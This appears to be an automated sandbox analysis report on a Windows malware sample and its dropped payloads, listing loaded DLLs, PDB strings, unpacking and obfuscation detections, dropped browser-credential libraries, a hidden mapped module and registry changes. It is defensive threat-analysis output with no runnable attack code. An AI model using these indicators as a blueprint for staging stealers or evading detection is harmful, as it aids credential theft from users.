Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: security.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: olepro32.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: schedcli.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: logoncli.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: msxml6.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: idndl.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: bitsproxy.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: TNQTc6Qmkg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: TNQTc6Qmkg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: TNQTc6Qmkg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: TNQTc6Qmkg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: TNQTc6Qmkg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: TNQTc6Qmkg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: TNQTc6Qmkg.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000005.00000002.2297845560.000000006C867000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000D.00000002.2732283280.000000006AF27000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: freebl3.pdbp source: freebl3.dll.1.dr
Source:	Binary string: PC:\puvosipuru_cece\hifikedaze\16 fimicupufe\xilucusamitavu_tub.pdb source: TNQTc6Qmkg.exe, 00000000.00000003.1729507004.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000000.1726640432.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: nss3.pdb@ source: u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr
Source:	Binary string: C:\nezudavoxuyel-61\padij\piw.pdb source: TNQTc6Qmkg.exe
Source:	Binary string: C:\puvosipuru_cece\hifikedaze\16 fimicupufe\xilucusamitavu_tub.pdb source: TNQTc6Qmkg.exe, 00000000.00000003.1729507004.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000000.1726640432.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000005.00000002.2297527350.0000000004060000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297404283.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2296477415.00000000027E3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594738875.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594968333.00000000057A0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2729599032.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730864076.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2731390962.000000000434D000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971130898.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971777839.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000005.00000002.2297527350.0000000004060000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297404283.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2296477415.00000000027E3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594738875.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594968333.00000000057A0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2729599032.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730864076.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2731390962.000000000434D000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971130898.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971777839.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr
Source:	Binary string: mozglue.pdb source: u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.dr
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000005.00000002.2295837403.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000005.00000000.2239188364.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2727602802.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2649348113.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr
Source:	Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: HDBKJEGIEB.exe, 0000001A.00000002.2969121960.0000000000B0C000.00000002.00000001.01000000.00000014.sdmp, HDBKJEGIEB.exe, 0000001A.00000000.2862082755.0000000000B0C000.00000002.00000001.01000000.00000014.sdmp, tiktok[1].exe.1.dr
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: UIxMarketPlugin.dll.5.dr

Source: TNQTc6Qmkg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: TNQTc6Qmkg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: TNQTc6Qmkg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: TNQTc6Qmkg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: TNQTc6Qmkg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Unpacked PE file: 1.2.u3bs.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Unpacked PE file: 0.2.TNQTc6Qmkg.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Unpacked PE file: 1.2.u3bs.0.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Code function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00416240

Source: relay.dll.0.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: osssciedmed.6.dr	Static PE information: real checksum: 0x0 should be: 0xc411c
Source: tiktok[1].exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: HDBKJEGIEB.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: TNQTc6Qmkg.exe	Static PE information: real checksum: 0x6f60e should be: 0x6f617
Source: bxhlahunbhc.14.dr	Static PE information: real checksum: 0x0 should be: 0xc411c
Source: relay.dll.5.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea

Source: u3bs.3.exe.0.dr	Static PE information: section name: .didata
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0042786C push ecx; ret	0_2_0042787C
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0042780C push eax; ret	0_2_0042782A
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0042E3A5 push esi; ret	0_2_0042E3AE
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_00409D06 push ecx; ret	0_2_00409D19
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_004097B6 push ecx; ret	0_2_004097C9
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_042674D3 pushad ; retf	0_2_042674D4
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_04268568 push ecx; iretd	0_2_0426856E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_04269D81 pushad ; retf	0_2_04269D88
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0426B7F3 push ebp; iretd	0_2_0426B826
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_04269A6B push 2B991403h; ret	0_2_04269A72
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0426A391 push 00000061h; retf	0_2_0426A399
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CF9F6D push ecx; ret	0_2_05CF9F80
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05D0C9FD push esp; retf	0_2_05D0C9FE
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05D0C3FF push esp; retf	0_2_05D0C407
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05D11B72 push dword ptr [esp+ecx-75h]; iretd	0_2_05D11B76
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05D17A73 push eax; ret	0_2_05D17A91
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CF9A1D push ecx; ret	0_2_05CF9A30
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_004176C5 push ecx; ret	1_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0AB536 push ecx; ret	1_2_6B0AB549
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_0009281F push esp; retn 0022h	5_2_00092820
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_00091088 push esp; retn 0022h	5_2_00091089
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_001EFAB6 push ecx; ret	5_2_001EFAC9
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_001EFB55 push ecx; ret	5_2_001EFB68
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_00091DA3 push esp; retn 0022h	5_2_00091DA4
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000A0F0B push 8B0025D1h; retf	5_2_000A0F10
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_0008EF7F push esp; retf 0022h	5_2_0008EF80
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_0008EFA7 push eax; retf 0022h	5_2_0008EFA8

Source: osssciedmed.6.dr	Static PE information: section name: .text entropy: 6.816444465715168
Source: bxhlahunbhc.14.dr	Static PE information: section name: .text entropy: 6.816444465715168

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File created: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File created: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\bxhlahunbhc	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\osssciedmed	Jump to dropped file
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File created: C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File created: C:\Users\user\AppData\Local\Temp\u3bs.2\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	File created: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\osssciedmed			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\bxhlahunbhc			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\OSSSCIEDMED
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BXHLAHUNBHC

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408761

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
